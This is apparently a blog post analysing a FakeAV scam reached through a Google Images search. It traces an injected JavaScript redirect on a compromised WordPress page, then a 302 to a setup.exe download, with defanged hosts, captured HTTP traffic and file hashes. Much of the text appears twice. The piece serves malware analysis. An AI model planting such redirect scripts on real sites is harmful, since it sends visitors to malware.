It was a simple search. Nothing more. I was looking for a picture of Dr. Sheldon Cooper from The Big Bang Theory. I go to Google Images and I (thought) I found such a nice one. I click on the thumbnail and suddenly this popped up (in a browser window):
Me thinks the browser doth protest too much.... looks like we have a FakeAV on our hands. Quick-- to the VM!
So I fire up my Windows XP image and start CaptureBAT on it. I go right back to the same image I went to before and clicked it, and kerpow the same website (kxxxxdefend.info/68efd410a6a48b3c/2/) with the 'Potential Security Alerts'. This time though I download the executable, which is 'setup.exe'.
Now wait a darn tootin minute here... how did we get to this other site? What happened to the original domain I requested (which I censored to protect the innocent)? Well this TCP dump could help shed some light.
Request:
GET /wp-content/plugins/slickr-flickr/sheldon-wallpaper HTTP/1.1
Host: xxxxxxxx.xxx
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: hxxp://www.google.co.uk/imgres?q=sheldon+cooper&hl=en&biw=1040&bih=768&gbv=2&tbm=isch&tbnid=Jccw2M05I0r6bM:&imgrefurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper&docid=qrYUJpskfIVYMM&imgurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper.jpg&w=1024&h=824&ei=jxN7T82RNsG_0QXY9724CQ&zoom=1&iact=hc&vpx=508&vpy=358&dur=34125&hovh=201&hovw=250&tx=101&ty=191&sig=107143226035704011362&page=2&tbnh=135&tbnw=166&start=26&ndsp=29&ved=1t:429,r:14,s:26
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response:
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2012 15:14:07 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6.3 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: PHP/5.3.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
9f
script var url = "hxxp://kxxxxdefend.info/68efd410a6a48b3c/2/"; if (window!=top) {top.location.href = url;} else { document.location= url;} /script
0
I actually had to remove the '<' and '>' else Google nicely tried to execute the script.... how thoughtful of them....
So I highlighted the interesting stuff in bold. So Slickr-Flickr is a plugin which allows a user to easily display Flickr photos in your blog. Cool. The script code confirms that something definitely happened to this guys site. Someone was able to upload a malicious redirect via (probably? I am not the best websec chick) the plugin or Wordpress itself. Regardless... not cool man-- to Malzilla!
So browsing via Malzilla shows us the code for the page we saw earlier:
So again I tried to highlight the good bits (I added the Moose text... ). We see a popup saying your computer is infected... no mater what you do, it calls the function 'al'... which gets us the ol familiar warning of impending doom on your computer. It basically says in the coordinates that happen to be over the 'Clean Computer' button, go to the download page. If you try to click the 'X' box, the function al is called again. Anyways lets point Mozilla to the 'download' page and see what happens.....
OMG! Another redirect! This is getting silly don't you think? Luckily as we can see this is the end... and we get our setup.exe. Look quickly again at the response we received when going to the download page:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 03 Apr 2012 16:22:37 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hxxp://dxxxxdebug.info/68efd410a6a48b3c/2/setup.exe
So we got to the 'download' page only to be pushed somewhere else. Info about the file:
As Dr. Cooper would say: BAZINGA
 |
| Ruh ruh Raggy!! |
Me thinks the browser doth protest too much.... looks like we have a FakeAV on our hands. Quick-- to the VM!
So I fire up my Windows XP image and start CaptureBAT on it. I go right back to the same image I went to before and clicked it, and kerpow the same website (kxxxxdefend.info/68efd410a6a48b3c/2/) with the 'Potential Security Alerts'. This time though I download the executable, which is 'setup.exe'.
Now wait a darn tootin minute here... how did we get to this other site? What happened to the original domain I requested (which I censored to protect the innocent)? Well this TCP dump could help shed some light.
Request:
GET /wp-content/plugins/slickr-flickr/sheldon-wallpaper HTTP/1.1
Host: xxxxxxxx.xxx
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: hxxp://www.google.co.uk/imgres?q=sheldon+cooper&hl=en&biw=1040&bih=768&gbv=2&tbm=isch&tbnid=Jccw2M05I0r6bM:&imgrefurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper&docid=qrYUJpskfIVYMM&imgurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper.jpg&w=1024&h=824&ei=jxN7T82RNsG_0QXY9724CQ&zoom=1&iact=hc&vpx=508&vpy=358&dur=34125&hovh=201&hovw=250&tx=101&ty=191&sig=107143226035704011362&page=2&tbnh=135&tbnw=166&start=26&ndsp=29&ved=1t:429,r:14,s:26
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response:
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2012 15:14:07 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6.3 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: PHP/5.3.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
9f
script var url = "hxxp://kxxxxdefend.info/68efd410a6a48b3c/2/"; if (window!=top) {top.location.href = url;} else { document.location= url;} /script
0
I actually had to remove the '<' and '>' else Google nicely tried to execute the script.... how thoughtful of them....
So I highlighted the interesting stuff in bold. So Slickr-Flickr is a plugin which allows a user to easily display Flickr photos in your blog. Cool. The script code confirms that something definitely happened to this guys site. Someone was able to upload a malicious redirect via (probably? I am not the best websec chick) the plugin or Wordpress itself. Regardless... not cool man-- to Malzilla!
So browsing via Malzilla shows us the code for the page we saw earlier:
So again I tried to highlight the good bits (I added the Moose text... ). We see a popup saying your computer is infected... no mater what you do, it calls the function 'al'... which gets us the ol familiar warning of impending doom on your computer. It basically says in the coordinates that happen to be over the 'Clean Computer' button, go to the download page. If you try to click the 'X' box, the function al is called again. Anyways lets point Mozilla to the 'download' page and see what happens.....
OMG! Another redirect! This is getting silly don't you think? Luckily as we can see this is the end... and we get our setup.exe. Look quickly again at the response we received when going to the download page:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 03 Apr 2012 16:22:37 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hxxp://dxxxxdebug.info/68efd410a6a48b3c/2/setup.exe
So we got to the 'download' page only to be pushed somewhere else. Info about the file:
- Name: setup.exe
- MD5: 22D7CF7B0591E8C9688769D5F502DDF4
- SHA: 1b9c0e6709b163e918477711c384705a8ef28eea776d58b86f49a98998ae8595
- Size: 2187394 bytes
- What VirusTotal Says: 5/42 AV's say its bad. Report here.
As Dr. Cooper would say: BAZINGA
1 comment:
Pretty scary that at the time of writing only 5/42 found it (its now 6/42).
Shows why users really need to protect themselves in an active way and only rely on AV for the low hanging fruit.
I often have Fiddler running in the background as I browse, just in case something like this happens so I can quickly track down the source.
Post a Comment